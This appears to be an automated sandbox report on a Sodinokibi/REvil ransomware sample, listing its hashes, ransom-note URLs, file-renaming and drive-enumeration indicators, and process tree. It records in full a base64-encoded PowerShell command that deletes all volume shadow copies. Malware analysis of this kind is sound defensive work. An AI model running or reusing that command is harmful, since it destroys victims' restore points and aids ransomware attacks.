Analysis
- max time kernel: 117s
- max time network: 129s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 24-01-2022 00:40
Static task: static1
Behavioral task: behavioral1
- Sample: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe
- Resource: win10-en-20211208
General
- Target: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe
- Size: 125KB
- MD5: 997717946529844208dace3d0b1ed237
- SHA1: a9845dacc58b6e542bd4972395da06d096246f79
- SHA256: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93
- SHA512: 25b10392315106a234c1d8881200724576acba6d6beb7684dceb2aeeae749d2a55c210988ce93195a2e96904f1e13fc23ac77fd4f750cc375a792aad4d61124a
Malware Config
- Extracted from: C:\k3fzcjjz0-readme.txt
- Family: sodinokibi
- URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/30D5E548A0E9A7A4
  - http://decryptor.cc/30D5E548A0E9A7A4
Signatures
- Sodin,Sodinokibi,REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Modifies extensions of user files (10 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe (the process column is this executable for every row)
  description | ioc
  File renamed | C:\Users\Admin\Pictures\SetExit.crw => \??\c:\users\admin\pictures\SetExit.crw.k3fzcjjz0
  File renamed | C:\Users\Admin\Pictures\UnprotectSubmit.crw => \??\c:\users\admin\pictures\UnprotectSubmit.crw.k3fzcjjz0
  File renamed | C:\Users\Admin\Pictures\UpdateUninstall.tif => \??\c:\users\admin\pictures\UpdateUninstall.tif.k3fzcjjz0
  File renamed | C:\Users\Admin\Pictures\BlockSkip.crw => \??\c:\users\admin\pictures\BlockSkip.crw.k3fzcjjz0
  File renamed | C:\Users\Admin\Pictures\BlockSync.png => \??\c:\users\admin\pictures\BlockSync.png.k3fzcjjz0
  File renamed | C:\Users\Admin\Pictures\ExpandUnlock.crw => \??\c:\users\admin\pictures\ExpandUnlock.crw.k3fzcjjz0
  File renamed | C:\Users\Admin\Pictures\GrantReceive.tiff => \??\c:\users\admin\pictures\GrantReceive.tiff.k3fzcjjz0
  File renamed | C:\Users\Admin\Pictures\MountLimit.png => \??\c:\users\admin\pictures\MountLimit.png.k3fzcjjz0
  File opened for modification | \??\c:\users\admin\pictures\GrantReceive.tiff
  File renamed | C:\Users\Admin\Pictures\TestConfirm.tif => \??\c:\users\admin\pictures\TestConfirm.tif.k3fzcjjz0
- Enumerates connected drives (3 TTPs, 25 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe (the process column is this executable for every row)
  description | ioc
  File opened (read-only) | one event per drive root, in the recorded order: \??\P:, \??\Y:, \??\D:, \??\I:, \??\J:, \??\M:, \??\N:, \??\S:, \??\U:, \??\B:, \??\K:, \??\L:, \??\O:, \??\R:, \??\V:, \??\Z:, \??\H:, \??\Q:, \??\T:, \??\W:, \??\A:, \??\E:, \??\F:, \??\G:, \??\X:
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\j69c5oi6m.bmp" | fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe
- Drops file in Program Files directory (32 IoCs)
  Processes: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe (the process column is this executable for every row)
  description | ioc
  File opened for modification | \??\c:\program files\RequestGrant.html
  File opened for modification | \??\c:\program files\StopExport.zip
  File opened for modification | \??\c:\program files\ApproveRestore.dot
  File opened for modification | \??\c:\program files\BackupMerge.iso
  File opened for modification | \??\c:\program files\DisconnectRequest.vbs
  File opened for modification | \??\c:\program files\InstallClose.au3
  File opened for modification | \??\c:\program files\LimitRevoke.kix
  File opened for modification | \??\c:\program files\DenyGroup.php
  File opened for modification | \??\c:\program files\PingSkip.ppsx
  File opened for modification | \??\c:\program files\RegisterConnect.vdw
  File opened for modification | \??\c:\program files\OpenRemove.m3u
  File opened for modification | \??\c:\program files\RepairUnpublish.M2TS
  File opened for modification | \??\c:\program files\RestoreResume.wma
  File opened for modification | \??\c:\program files\UndoUnblock.001
  File opened for modification | \??\c:\program files\ReceiveWatch.aifc
  File opened for modification | \??\c:\program files\ResetUninstall.tiff
  File created | \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\k3fzcjjz0-readme.txt
  File opened for modification | \??\c:\program files\GrantDisable.AAC
  File opened for modification | \??\c:\program files\ReadConnect.m4v
  File created | \??\c:\program files (x86)\microsoft sql server compact edition\k3fzcjjz0-readme.txt
  File created | \??\c:\program files\k3fzcjjz0-readme.txt
  File opened for modification | \??\c:\program files\InvokeClear.M2T
  File opened for modification | \??\c:\program files\PopRepair.m1v
  File opened for modification | \??\c:\program files\SendCompress.AAC
  File opened for modification | \??\c:\program files\UnblockClear.3g2
  File opened for modification | \??\c:\program files\GrantStop.dot
  File opened for modification | \??\c:\program files\MergeUninstall.wdp
  File opened for modification | \??\c:\program files\OutEdit.emf
  File opened for modification | \??\c:\program files\PushRemove.pot
  File created | \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\k3fzcjjz0-readme.txt
  File created | \??\c:\program files (x86)\k3fzcjjz0-readme.txt
  File opened for modification | \??\c:\program files\RemoveWatch.odt
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe, powershell.exe
  pid | process
  1624 | fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe
  1300 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeDebugPrivilege | 1624 | fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe
  Token: SeDebugPrivilege | 1300 | powershell.exe
  Token: SeBackupPrivilege | 788 | vssvc.exe
  Token: SeRestorePrivilege | 788 | vssvc.exe
  Token: SeAuditPrivilege | 788 | vssvc.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes: fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe
  description | pid | process | target process
  PID 1624 wrote to memory of 1300 | 1624 | fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe | powershell.exe (this identical event is recorded four times)
Processes
- C:\Users\Admin\AppData\Local\Temp\fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe (level 1, PID 1624)
  Command line: "C:\Users\Admin\AppData\Local\Temp\fc60327dd121edebeac149012a66191b38ec0427697c4fb86d4218f6e023fc93.exe"
  - Modifies extensions of user files
  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 2, child of PID 1624, PID 1300)
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    (The -e argument is a base64-encoded UTF-16LE script; this one decodes to a WMI query over Win32_ShadowCopy that calls Delete() on every volume shadow copy, which is what triggers the vssvc.exe activity below and removes the victim's local restore points.)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe (level 1, PID 612)
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\vssvc.exe (level 1, PID 788)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
file | size
memory/1300-56-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmp | 8KB
memory/1300-58-0x0000000002600000-0x0000000002602000-memory.dmp | 8KB
memory/1300-59-0x0000000002602000-0x0000000002604000-memory.dmp | 8KB
memory/1300-60-0x0000000002604000-0x0000000002607000-memory.dmp | 12KB
memory/1300-57-0x000007FEF2810000-0x000007FEF336D000-memory.dmp | 11.4MB
memory/1300-61-0x000000001B7D0000-0x000000001BACF000-memory.dmp | 3.0MB
memory/1300-62-0x000000000260B000-0x000000000262A000-memory.dmp | 124KB
memory/1624-55-0x0000000075AB1000-0x0000000075AB3000-memory.dmp | 8KB